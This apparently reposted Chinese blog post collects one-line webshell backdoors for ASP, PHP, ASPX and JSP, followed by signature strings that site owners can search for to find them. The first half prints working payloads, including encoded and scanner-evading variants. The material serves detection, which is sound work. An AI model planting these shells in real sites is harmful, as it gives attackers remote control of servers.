收集一些常见的webshell后门的特征码
来源:互联网 发布:网络超市有前景吗 编辑:程序博客网 时间:2024/06/05 21:44
收集一些常见的webshell后门的特征码
一些常见的webshell(asp,aspx,php,jsp等)后门木马。
什么是一句话木马?不了解的朋友百度一下。
一句话木马具体有以下这些,这些都是自己平时收集的。(当然收集不齐全,希望大家帮忙完善~)
============================
asp一句话木马:
<%%25Execute(request("a"))%%25>
<%Execute(request("a"))%>
%><%execute request("a")%><%
<script language=VBScript runat=server>execute request("a")</script>
<%25Execute(request("a"))%25>
%><%execute request("yy")%>
<%execute request(char(97))%>
<%eval request(char(97))%>
":execute request("value"):a="
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>
在数据库里插入的一句话木马
┼攠數畣整爠煥敵瑳∨∣┩愾
┼癥污爠煥敵瑳∨≡┩> 密码为: a
utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>
可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>
php一句话
<? php eval($_POST[cmd]);?>
<?php eval($_POST[cmd]);?>
<?php system($_REQUEST['cmd']);?>
<?php eval($_POST[1]);?>
aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
JSP一句话后门
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
================================我是邪恶的分界线==============================
为什么收集这些东东?
有些站长说,webshell找到了,服务器打了补丁,网站漏洞也给补上了。甚至把整个web目录所有的文件都检查了多次,都没找到可疑的文件。为什么黑客还是让网站挂上木马了?
猜也猜得到拉,被放后门呗!那后门在哪?比较简单而且有效的方法当然是在正常文件里写入一句话木马了,以后连接上去就是了。况且杀毒软件对某些一句话木马不敏感,这个,玩黑的朋友都知道了~
也许你会问,能不能彻底把后门挖出来?这个难说~我就不敢保证了,哈哈。。。
不过下面这些或许对你有帮助。
下面整理了一些webshell后门的特征码(搜索的时候不要区分大小写):
asp木马特征:
aspshell
Execute(request
execute request(
eval request(
"ev"&"al(request(
ExecuteGlobal request
┼癥污爠煥敵瑳∨≡┩>
┼攠數畣整爠煥敵瑳∨∣┩愾
SqlRootkit
专用小马
小马
整站文件打包
确认解包吗
dama
不要干坏事
hack
fuck
郁闷,权限不够估计不能执行命令!
php木马特征:
base64
base64_decode
angle
<? php eval($_POST[cmd]);?>
<?php eval($_POST[
<?php system($_REQUEST['cmd']);?>
<?php system($_REQUEST[
phpspy
Scanners
打包下载
打包程序扩展名
asp.net木马特征:
ASPXSpy
专用小马
rootkit
jsp木马特征:
JFolder (我就只有这个。。。)
以上面这些作为特征码,用这个工具advanced find and replace 搜索可疑的文件,或许会找出点邪恶的东西,还工具还可以批量清马,并支持正则表达式,站长必备工具,呵呵!
当然还可以按文件修改时间进行搜索可疑文件,不过有些webshell支持文件属性修改。
AFR下载地址:
afr (advanced find and replace) 中文绿色版.rar
之前转了个文章,这里有介绍
- 收集一些常见的webshell后门的特征码
- 收集一些常见的webshell后门的特征码
- 安全的使用带后门的webshell
- 如何更简单的留你的webshell后门
- 给使用“十三 WebShell”后门黑客的重磅炸弹
- Linux系统下查找webshell后门的强大命令
- 一些常见的特征选择方法
- 收集的Myeclipse一些常见的使用
- linux webshell下信息收集和一些提权常用的命令
- linux webshell下信息收集和一些提权常用的命令
- vim 的一些常见命令收集
- 在我的网站上传后门拿到webshell的文件sitemap.asa
- 【转】webshell中的不死僵尸和隐藏后门的原理以及删除
- 常见的特征提取
- 一些常见的C#代码收集站点(牛)
- Sphinx全文索引搜索常见的一些错误处理收集
- 收集的android API中一些常见英语生僻词
- JBOSS常见错误以及一些部署错误的收集
- Mysql提权
- Send_44_info
- 服务器被挂马的一般解决方法
- 黑客如何快速查找网站后台地址方法整理
- duplicate symbols for architecture arm64 错误
- 收集一些常见的webshell后门的特征码
- 313. Super Ugly Number
- EXCEL中如何固定工作表头
- MyBatis排序时使用order by 动态参数时需要注意,用$而不是#
- 求一网站swf广告条幅制作软件 SwishMax
- TCP与UDP的区别,以及它们各自的定义
- 简简单单将Swf打回“源”形
- 
- 【转载】dedecms中的{dede:php}{/dede:php}的详细用法